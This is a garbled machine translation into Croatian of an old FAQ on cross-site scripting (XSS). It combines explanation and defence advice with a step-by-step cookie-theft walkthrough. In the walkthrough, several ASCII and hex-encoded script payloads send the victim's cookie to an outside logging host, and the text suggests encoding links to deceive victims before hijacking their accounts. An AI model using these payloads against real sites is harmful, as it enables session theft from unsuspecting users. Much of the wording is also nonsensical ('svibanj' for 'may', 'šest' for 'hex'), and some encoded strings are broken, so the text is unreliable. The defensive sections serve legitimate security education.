Križ site Scripting (XSS) faq

Autor: Prakash Thapa
Dokumentirane pod: Sigurnost

Ponedjeljak
Lipanj 18,2007

Web stranice danas su složenije nego ikad, s puno dinamički sadržaj izradu iskustvo za korisnika još ugodnijim. Dinamički sadržaj se postiže kroz upotrebu web aplikacija koje mogu dati različite izlaz korisnika, ovisno o njihovim postavkama i potrebama. Dinamičke web stranice pate od prijetnja da ne statičkih web stranica, pod nazivom "Cross Site Scripting (XSS dubbed ili drugih sigurnosnih profesionalaca). Trenutno male informativne tidbits Cross Site Scripting o rupa postoji, ali nikog jako objasniti im da se prosječna osoba ili administratora. Ovaj FAQ je pisao pružiti bolje razumijevanje ovog nastajanju opasnosti, i dati smjernice za otkrivanje i prevenciju.

Što je križ Site Scripting?

Križa stranica skriptiranje (također poznat kao XSS) pojavljuje kada web aplikacija prikuplja podatke od zlonamjernih korisnika. Podaci se obično okupili u obliku hipervezu koja sadrži zlonamjerni sadržaj unutar nje. Korisnik će najvjerojatnije kliknite na ovaj link s druge web stranice, trenutačnih poruka, ili jednostavno samo čitanje web odbora ili e-mail poruka. Obično je napadač će kodirati u zlonamjerne dio link na site-a Hex (ili drugim metodama kodiranja) pa je sumnjivih zahtjev je manje izgleda da se kad korisnik klikne na. Nakon što se podaci prikupljaju se na web aplikacija, to stvara output stranicu za korisnika sadrži zlonamjerni podataka koje je prvobitno poslan na to, ali na način da ga se pojavljuju kao valjan sadržaj od web stranice. Mnogi popularni guestbook, forum, chat, programi omogućiti korisnicima da pošaljete komentara sa HTML i Javascript ugrađen u njih. Ako za primjer sam bio prijavljen kao "John" i pročitajte poruku "Joe" koji je sadržavao malicioznog JavaScript u njoj, a zatim je za svibanj biti moguće "Joe" na sjednici oteti moje samo čitajući njegove oglasne ploče post. Daljnje pojedinosti o tome kako napada poput ovoga izvršeno je preko "Cookie" krađe "detaljno su opisane u nastavku.

Što XSS i CSS znači?

Često ljudi odnose se na križu Site Scripting kao CSS. Došlo je mnogo konfuzije s kaskadno Style Sheets (CSS) i križ stranica skriptiranje. Neki ljudi se odnose na sigurnost Cross Site Scripting XSS kao. Ako čujete nekoga reći "Ja sam našao XSS rupa", oni su razgovarali o križu Site Scripting za određene.

Koje su prijetnje od Križa Site Scripting?

Često napadači će ubaciti JavaScript, VBScript, ActiveX, HTML, Flash ili u ranjive aplikacije na bezuman korisniku (Čitaj dolje za daljnje detalje) kako bi se okupiti podataka s njima. Sve od otmice računa, mijenjanje korisničkih postavki, krađu cookie / trovanja ili lažno oglašavanje je moguće. Novi zlonamjernog koristi se nađe svaki dan za XSS napada. Post ispod koje Brett Moore će se dobra stvar s obzirom na "Odbijanje usluge", i potencijal "Auto-napadaju" nad Vojskama ako korisnik jednostavno pročita post na poruku odbora.
http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0311.html

Koji su primjeri stranica skriptiranje napadi križem?

Jedan proizvod sa mnogo XSS rupa je popularan PHP programa PHPnuke. Ovaj proizvod je često na koje cilja napadači na sonde za XSS rupa zbog njegove popularnosti. Imam uključen nekoliko linkova od upozorenja / izvješća koje su otkrivene i na uvid samo iz ovog proizvoda na miru. Slijedi zbirka trebala bi pružiti dosta primjera.
www.cgisecurity.com / arhiva / php / phpNuke_cross_site_scripting.txt
www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

Možete li mi pokazati što XSS krađe kolačića izgleda?

Zavisno o pojedinom web aplikacija neke od varijabli i pozicioniranja od davanja injekcija svibanj morati biti prilagođen. Imajte na umu sljedeće je jednostavan primjer od napadača je metodologija. U našem primjeru ćemo iskorištavati križ stranica skriptiranje rupa na perimetar i "a.php" pod nazivom "varijable" putem normalan zahtjev. Ovo je najčešći tip križ stranica skriptiranje rupa koja postoji.

Korak 1: Ciljanje

Nakon što su otkrili jedan XSS rupa u web aplikaciju na web stranicu, provjerite je li ona pitanja kolačiće. Ako bilo koji dio web stranica koristi cookije, onda je moguće ukrasti ih od svojih korisnika.

Korak 2: Testiranje

Budući da su različite XSS rupa u tome kako su eksploatiran, neki testiranje će morati biti učinjeno kako bi izlazni uvjerljivi. By umetanje koda u skriptu, njen output će biti promjena i na stranici svibanj pojaviti slomljena. (Krajnji rezultat je presudan i napadač će morati napraviti nešto dira u kod stranice da se prikazuju normalno.) Dalje ćete morati umetnuti neke Javascript (ili neki drugi klijent strani jezik skriptiranja) na URL koji pokazuje da je dio na stranici koja je ranjiva. Ovdje sam nekoliko linkova koji su za javnu uporabu, kada za testiranje XSS rupa. Ovi linkovi dolje, kada se pritisne na poslat će korisnici kolačić za www.cgisecurity.com / CGI-bin / cookie.cgi i prikazat će ga. Ako vidite stranicu prikazujući cookie zatim sjednici otmice od korisnika račun svibanj biti moguće.

Javascript Primjeri krađu cookieja.
A primjer uporabe je ispod.

ASCII Upotreba:

  http://host/a.php?variable = "> <script> document.location = 'http://www.cgisecurity.com/cgi-bin/cookie.cgi?'% 20 + document.cookie < / script>

Hex Upotreba:

  http://host/a.php?variable =% 22% 3e% 3c% 73% 63% 72% 69% 70% 74% 3e% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e % 6c% 6f 
  % 63% 61% 74% 69% 6f% 6e% 3d% 27% 68% 74% 74% 70% 3a% 2f% 2f% 77% 77% 77% 2E% 63% 67 
  % 69% 73% 65% 63% 75% 72% 69% 74% 79% 2E% 63% 6f% 6d% 2f% 63% 67% 69% 2d% 62% 69% 6e% 2f% 63% 6f 
  % 6f% 6b% 69% 65% 2E% 63% 67% 69% 3f% 27% 20% 2B% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2E% 63% 6f% 6f% 6b % 69% 65% 3c% 2f% 73% 63% 72% 69% 70% 74% 3e

NAPOMENA: Zahtjev je prvi prikazan u ASCII, zatim u Hex za kopirajte i zalijepite svrhe.

Primjer 1
ASCII:

  "> <script> document.location = 'http://www.cgisecurity.com/cgi-bin/cookie.cgi?"  + document.cookie </ script>

Hex:

  % 22% 3e% 3c% 73% 63% 72% 69% 70% 74% 3e% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e 
  % 6c% 6f% 63% 61% 74% 69% 6f% 6e% 3d% 27% 68% 74% 74% 70% 3a% 2f% 2f% 77% 77% 77% 2E% 63% 67% 69% 73 65% 
  % 63% 75% 72% 69% 74% 79% 2E% 63% 6f% 6d% 2f% 63% 67% 69% 2d% 62% 69% 6e% 2f 
  % 63% 6f% 6f% 6b% 69% 65% 2E% 63% 67% 69% 3f% 27% 20% 2B% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2E% 63% 6f % 6f% 6b% 69% 65% 3c% 2f% 73% 63% 72% 69% 70% 74% 3e

Primjer 2
ASCII:

  <script> document.location = 'http://www.cgisecurity.com/cgi-bin/cookie.cgi? "  + document.cookie </ script>

Hex:

  % 3c% 73% 63% 72% 69% 70% 74% 3e% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e% 6c% 6f 
  % 63% 61% 74% 69% 6f% 6e% 3d% 27% 68% 74% 74% 70% 3a% 2f% 2f% 77% 77% 77% 2E% 63% 67% 69% 73% 65% 63 % 75% 72 
  % 69% 74% 79% 2E% 63% 6f% 6d% 2f% 63% 67% 69% 2d% 62% 69% 6e% 2f% 63% 6f% 6f% 6b 
  % 69% 65% 2E% 63% 67% 69% 3f% 27% 20% 2B% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2E% 63% 6f% 6f% 6b% 69% 65 % 3c% 2f% 73% 63% 72% 69% 70% 74% 3e

Primjer 3
ASCII:

  > <script> document.location = 'http://www.cgisecurity.com/cgi-bin/cookie.cgi? "  + document.cookie </ script>

Hex:

  % 3e% 3c% 73% 63% 72% 69% 70% 74% 3e% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e% 6c 
  % 6f% 63% 61% 74% 69% 6f% 6e% 3d% 27% 68% 74% 74% 70% 3a% 2f% 2f% 77% 77% 77% 2E% 63% 67% 69% 73% 65 % 63% 75 
  % 72% 69% 74% 79% 2E% 63% 6f% 6d% 2f% 63% 67% 69% 2d% 62% 69% 6e% 2f% 63% 6f% 6f 
  % 6b% 69% 65% 2E% 63% 67% 69% 3f% 27% 20% 2B% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2E% 63% 6f% 6f% 6b% 69 % 65% 3c% 2f% 73% 63% 72% 69% 70% 74% 3e

Ovo su primjeri "zlo" Javascript ćemo se koristi. Ovi primjeri Javascript skupiti korisnici kolačića, a zatim poslati zahtjev za cgisecurity.com web stranice sa Cookie u upitu. Moje skripte na cgisecurity.com logove svaki zahtjev i svaki kolačić. U pojednostavljeno rečeno je na sljedeći način:

Moj Cookie = user = Zenon; id = 021
Moje skripte = www.cgisecurity.com / CGI-bin / cookie.cgi

To šalje zahtjev za moje stranice da izgleda kao ovaj.

GET / cgi-bin/cookie.cgi? Korisnik = Zenon;% 20id = 021 (Napomena: 20% je šest kodiranje za prostor)

To je primitivni, ali učinkovit način grabbing korisnika kolačića. Evidencije o korištenju ovog javnog skripte mogu se naći na www.cgisecurity.com / articles / cookie-theft.log

Korak 3: izvršavanje XSS

Ručna haker svoj URL ili e-mail ili korištenje drugih srodnih softver kako bi se pokrenuti ga. Pobrinite se da se, ako pružiti URL korisnik (putem e-pošte, cilj, ili na druge načine) da najmanje šest kodirati ga. Kodeks je očito sumnjiva izgleda, ali gomila šest znakova svibanj budalu nekoliko ljudi.

U mom primjeru sam samo prosljeđuje korisniku cookie.cgi. A napadač s više vremena mogao učiniti nekoliko preusmjeravanja i XSS kombinirani's krasti korisnikove kolačić, i vratiti ih na web stranicu bez noticing cookie krađe.
Neki programi za e-poštu svibanj izvršavanje JavaScript na otvaranju poruku ili ako je JavaScript sadržane u poruci privitak. Veći sučelja kao što su Hotmail učiniti omogućiti Javascript unutar privitke ali da se spriječi filtriranjem posebne krađe kolačića.

Korak 4: Što učiniti s ovim podacima

Nakon što je stečen korisnik izvršiti XSS rupa, podaci se prikupljaju i poslao na svoj CGI skripte. Sada kada ste cookie možete koristiti alat kao što je Websleuth da vidi ako je moguće otmice računa.
Ovo je samo FAQ, a ne detaljan rad na kolačić krađu i izmjenu. A novi papir izdan David Endler od iDefense ide u više detalja na neki od načina za automatsko pokretanje XSS rupa. Ovaj rad može se naći na www.idefense.com / XSS.html.

Što mogu učiniti kako bi zaštitili sebe kao prodavatelja?

To je jednostavan odgovor. Nikad ne vjerovati korisničkih unosa i uvijek filtar metacharacters. Ovo će eliminirati većinu XSS napada. Pretvaranje <i> i <i> je također sugerirao kada se radi skripta ispiše. Zapamti XSS rupa može biti štetan i skupe za vaše poslovanje ukoliko zlostavljali. Često napadači će otkriti tih rupa za javnost, koje mogu nagrizati kupca i povjerenje javnosti u sigurnost i privatnost Vaših organizacije stranica. Filtriranje <i> sami neće riješiti sve napadi križem stranica skriptiranje i je li predloženi i pokušati filtrira (i) po prevodio ih (i), a također i # & prevodio tako da ih i # 35 (#) i & (&).

Što mogu učiniti kako bi zaštitili sebe kao korisnik?

Najjednostavniji način za zaštitu sebe kao korisniku je samo da slijedite poveznice s glavne web stranice koju želite pogledati. Ako posjetite neku web stranicu i veze na CNN-na primjer, umjesto da ga posjetite klikom na CNN glavni stranica i koristiti svoje tražilice za pronalaženje sadržaja. To će vjerojatno eliminirati devedeset posto problem. Ponekad XSS se izvršavaju automatski kada otvorite e-mail, e-pošte s privitkom, pročitati knjigu gostiju, ili oglasne ploče post. Ako namjeravate na otvaranju e-mail, ili čitanje post na javnim odbora od osoba koje ne znaju biti oprezni. Jedan od najboljih načina zaštite je da isključili Javascript u postavkama vašeg web preglednika. U IE pretvoriti vaše sigurnosne postavke na visoke. To se može spriječiti krađe kolačića, i općenito je sigurnije što učiniti.

Kako su XSS rupa?

Križa stranica skriptiranje rupa se dobije popularnost među hackeri kao rupa lako pronaći u velikim web stranica. Web-sajtovi iz FBI.gov, CNN.com, Time.com, eBay, Yahoo, Apple Computer, Microsoft, Zdnet, Žičane i Newsbytes su svi imali jedan oblik ili nekom drugom XSS bugova.

Svaki mjesec otprilike 10-25 XSS rupa nalaze u komercijalnim proizvodima i upozorenja objavljeni su objašnjenjem prijetnja.

Da li šifriranje zaštitili mene?

Web stranice koje koriste SSL (https) ni na koji način ne više od zaštićenih webove koji nisu kriptirani. Web aplikacije rade na isti način kao i prije, osim napada se odvija u kriptirane veze. Ljudi često misle da zato što su vidjeli na svojim zaključavanje preglednik to znači da je sve sigurniji. To jednostavno nije slučaj.

XSS rupa može omogućiti izvršavanje naredbe?

XSS rupa može omogućiti Javascript umetanje, što svibanj omogućiti izvršavanje ograničen. Ako je napadač bio je podvig preglednik mana (preglednik rupa) da bi mogao zatim biti moguće izvršiti naredbe na strani klijenta. Ako je izvršenje naredbe moguće da će biti moguće samo na strani klijenta. Pojednostavljeno XSS rupa se može koristiti kako bi se iskorištavaju druge koji svibanj postoji rupa u svom pregledniku.

Što ako ne osjećate kao Ispravljanje CSS / XSS rupe?

Po ne popravljajući jedan XSS rupa taj mogao dopustiti moguće korisnički račun kompromis u dijelove vaše stranice kao što su dobili dodano ili ažuriran. Cross Site Scripting je pronađen u različitim sučeljima velikih i nedavno su široko publicized. Lijevi nepopravljen, netko svibanj otkriti i objaviti upozorenje o Vašoj tvrtki. Ovaj svibanj šteta ugledu Vaše tvrtke, s prikazom ga kao labav o sigurnosnim pitanjima. To, naravno, i šalje poruku klijentima koje se ne bave svaki problem koji proizlazi, koji pretvara u pitanje povjerenja. Ako vaš klijent ne vjerovati vam zašto bi oni žele poslovati s vama?